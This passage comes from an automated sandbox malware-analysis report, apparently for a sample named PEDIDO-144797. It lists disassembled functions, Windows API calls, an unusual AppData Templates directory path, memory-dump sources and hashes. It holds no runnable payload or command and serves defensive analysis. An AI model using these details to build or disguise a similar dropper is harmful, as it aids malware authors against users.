                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Close$Enum
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 464197530-0
                                                                                                                                          • Opcode ID: df4bd2222173038e22a6f7143f63260fc380016edffd80d7804df4238b5218be
                                                                                                                                          • Instruction ID: 0f4b1bf7762f76a333ccd5711aab570045f86c75fcf3a50f9e11fcc9d843940a
                                                                                                                                          • Opcode Fuzzy Hash: df4bd2222173038e22a6f7143f63260fc380016edffd80d7804df4238b5218be
                                                                                                                                          • Instruction Fuzzy Hash: 21116A32540509FBDF129F90CE09BEE7B69EF58344F110076B905B50E0E7B5DE21AB68
                                                                                                                                          Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 926 4015c1-4015d5 call 402c37 call 405d2c 931 401631-401634 926->931 932 4015d7-4015ea call 405cae 926->932 934 401663-40224a call 401423 931->934 935 401636-401655 call 401423 call 4063b0 SetCurrentDirectoryW 931->935 939 401604-401607 call 405960 932->939 940 4015ec-4015ef 932->940 949 402885-40288c 934->949 950 402abf-402ace 934->950 935->950 955 40165b-40165e 935->955 951 40160c-40160e 939->951 940->939 943 4015f1-4015f8 call 40597d 940->943 943->939 959 4015fa-4015fd call 4058e3 943->959 949->950 952 401610-401615 951->952 953 401627-40162f 951->953 957 401624 952->957 958 401617-401622 GetFileAttributesW 952->958 953->931 953->932 955->950 957->953 958->953 958->957 962 401602 959->962 962->951
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,77762EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,77762EE0,00000000), ref: 00405D3A
                                                                                                                                            • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
                                                                                                                                            • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57
                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                            • Part of subcall function 004058E3: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405926
                                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\sludrehovedet\mississippi,?,00000000,000000F0), ref: 0040164D
                                                                                                                                          Strings
                                                                                                                                          • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\sludrehovedet\mississippi, xrefs: 00401640
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\sludrehovedet\mississippi
                                                                                                                                          • API String ID: 1892508949-2076318099
                                                                                                                                          • Opcode ID: 63e3afcb8f518b8f961fa91b0460bec2abaa85340c93af8d37e8798651ac2648
                                                                                                                                          • Instruction ID: a4cb8c34a70438e14e420fb04ab38ad532f12a03bdfc5322accc4ce246dd33dc
                                                                                                                                          • Opcode Fuzzy Hash: 63e3afcb8f518b8f961fa91b0460bec2abaa85340c93af8d37e8798651ac2648
                                                                                                                                          • Instruction Fuzzy Hash: 9011BE31504104EBCF31AFA0CD0199F36A0EF14368B28493BEA45B22F1DB3E4D51DA4E
                                                                                                                                          Function 00405995 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059BE
                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004059CB
                                                                                                                                          Strings
                                                                                                                                          • Error launching installer, xrefs: 004059A8
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                          • String ID: Error launching installer
                                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                                          • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                                          • Instruction ID: 7702c274cdf70951028335e9b96fa9876c0cc9a795fc840707e03dbfe60e7272
                                                                                                                                          • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                                          • Instruction Fuzzy Hash: B4E046F0A00209BFEB009BA4ED09F7BBAACFB04208F418431BD00F6190D774A8208A78
                                                                                                                                          Function 00406EEF Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 86ce5b7836e8efc76d9880a3b815598044ae852516a7a266a4593ffa0bd4c046
                                                                                                                                          • Instruction ID: 1a1db7b112f5c349f32c040b215ce8adb2231ea54f988815808aa67dfaaa6b76
                                                                                                                                          • Opcode Fuzzy Hash: 86ce5b7836e8efc76d9880a3b815598044ae852516a7a266a4593ffa0bd4c046
                                                                                                                                          • Instruction Fuzzy Hash: 6AA15271E04228CBDF28CFA8C8446ADBBB1FF44305F14816ED856BB281D7786A86DF45
                                                                                                                                          Function 004070F0 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f289ec4eae441b973c5cf469eb2209b78d92787f90c2f70d8ea77383fdb072af
                                                                                                                                          • Instruction ID: 81ced8d75bd8cd674d530aa485ef516b0f39a629971cfce93107e9c84bdcedbb
                                                                                                                                          • Opcode Fuzzy Hash: f289ec4eae441b973c5cf469eb2209b78d92787f90c2f70d8ea77383fdb072af
                                                                                                                                          • Instruction Fuzzy Hash: 4E912170E04228CBDF28CFA8C8547ADBBB1FB44305F14816ED856BB281D778A986DF45
                                                                                                                                          Function 00406E06 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
                                                                                                                                          • Instruction ID: 6e186065c07e551db02da0b657444ed8a40fac9cbefa0218a87430385e41b7b0
                                                                                                                                          • Opcode Fuzzy Hash: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
                                                                                                                                          • Instruction Fuzzy Hash: F7814571E04228CFDF24CFA8C8447ADBBB1FB45305F24816AD856BB281C778A996DF45
                                                                                                                                          Function 0040690B Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: fd90919654d861d793b9259fd4ddd35531221e69384e43b7f209bc021a7cca94
                                                                                                                                          • Instruction ID: 1a645af2666a8cd9619cdf871bd9e2c738fb6a6c353dc56c4864b2e7a25bf22b
                                                                                                                                          • Opcode Fuzzy Hash: fd90919654d861d793b9259fd4ddd35531221e69384e43b7f209bc021a7cca94
                                                                                                                                          • Instruction Fuzzy Hash: 71816771E04228DBEF28CFA8C8447ADBBB1FB44301F14816AD956BB2C1C7786986DF45
                                                                                                                                          Function 00406D59 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7afd307a57d874939e6d1f07c4a81c11abd2b71d61e18d684fba0f23c35f734a
                                                                                                                                          • Instruction ID: b0583babc1dad824d13d86abae56a1a356e3ceb45be48e511182641c275db258
                                                                                                                                          • Opcode Fuzzy Hash: 7afd307a57d874939e6d1f07c4a81c11abd2b71d61e18d684fba0f23c35f734a
                                                                                                                                          • Instruction Fuzzy Hash: 8C712471E04228CFDF28CFA8C9447ADBBB1FB44305F15806AD856BB281D7386996DF45
                                                                                                                                          Function 00406E77 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: c52b64c4cba7ecf1fb5e1bb59396999cb3f4df188a1ab73f316032be63138ba7
                                                                                                                                          • Instruction ID: 968097f9e37e498ed83c4652799cdf8e1ebeb5c7fee57b8dc09d96684c556b9e
                                                                                                                                          • Opcode Fuzzy Hash: c52b64c4cba7ecf1fb5e1bb59396999cb3f4df188a1ab73f316032be63138ba7
                                                                                                                                          • Instruction Fuzzy Hash: 27712471E04228CFDF28CFA8C854BADBBB1FB44305F15806AD856BB281C7786996DF45
                                                                                                                                          Function 00406DC3 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: c741c7bc90f3712fe41ea972859e43f39dd565e03f7b0e7aa23f6ef9dcbd7f18
                                                                                                                                          • Instruction ID: 737cb098acab11621bc79b115fd6dc57f162d32c21417d2b0fd17844244e9397
                                                                                                                                          • Opcode Fuzzy Hash: c741c7bc90f3712fe41ea972859e43f39dd565e03f7b0e7aa23f6ef9dcbd7f18
                                                                                                                                          • Instruction Fuzzy Hash: 5A714571E04228CFEF28CF98C8447ADBBB1FB44305F14806AD956BB281C778A996DF45
                                                                                                                                          Function 004032C2 Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetTickCount.KERNEL32 ref: 004032D6
                                                                                                                                            • Part of subcall function 00403441: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F
                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 00403309
                                                                                                                                          • SetFilePointer.KERNELBASE(00149F32,00000000,00000000,00414ED0,00004000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000), ref: 00403404
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FilePointer$CountTick
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1092082344-0
                                                                                                                                          • Opcode ID: 63f894617870b8b9b6b4d0f35ad55c68ae2789ba15d09fbc75adc17a06edb544
                                                                                                                                          • Instruction ID: 8a5bf560653b24f1bd3cd60389d49066fb51751ebaffca469d7b7cf87711dc5f
                                                                                                                                          • Opcode Fuzzy Hash: 63f894617870b8b9b6b4d0f35ad55c68ae2789ba15d09fbc75adc17a06edb544
                                                                                                                                          • Instruction Fuzzy Hash: 10316C72610211DBD711DF29EEC49A63BA9F78439A714823FE900B62E0CBB95D058B9D
                                                                                                                                          Function 0040202C Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402057
                                                                                                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                                                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                                                                                            • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                                                                                                            • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                                                                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                                                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                                                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402068
                                                                                                                                          • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
